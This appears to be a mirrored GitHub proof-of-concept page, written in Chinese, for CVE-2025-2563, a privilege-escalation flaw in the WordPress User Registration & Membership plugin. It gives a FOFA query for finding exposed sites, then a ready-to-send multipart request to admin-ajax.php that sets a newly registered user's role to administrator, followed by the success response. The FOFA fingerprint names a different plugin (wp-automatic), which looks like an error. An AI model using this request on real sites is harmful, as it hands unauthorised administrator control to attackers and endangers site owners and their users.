mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
1.4 KiB
1.4 KiB
WordPress (User Registration & Membership) Plugin权限提升漏洞(CVE-2025-2563)
fofa
"/wp-content/plugins/wp-automatic"
第一步
通过 /registration 或 /membership-registration 前端页面注册
第二步,注册后,使用该请求数据
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
第三步,返回相应包如下
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}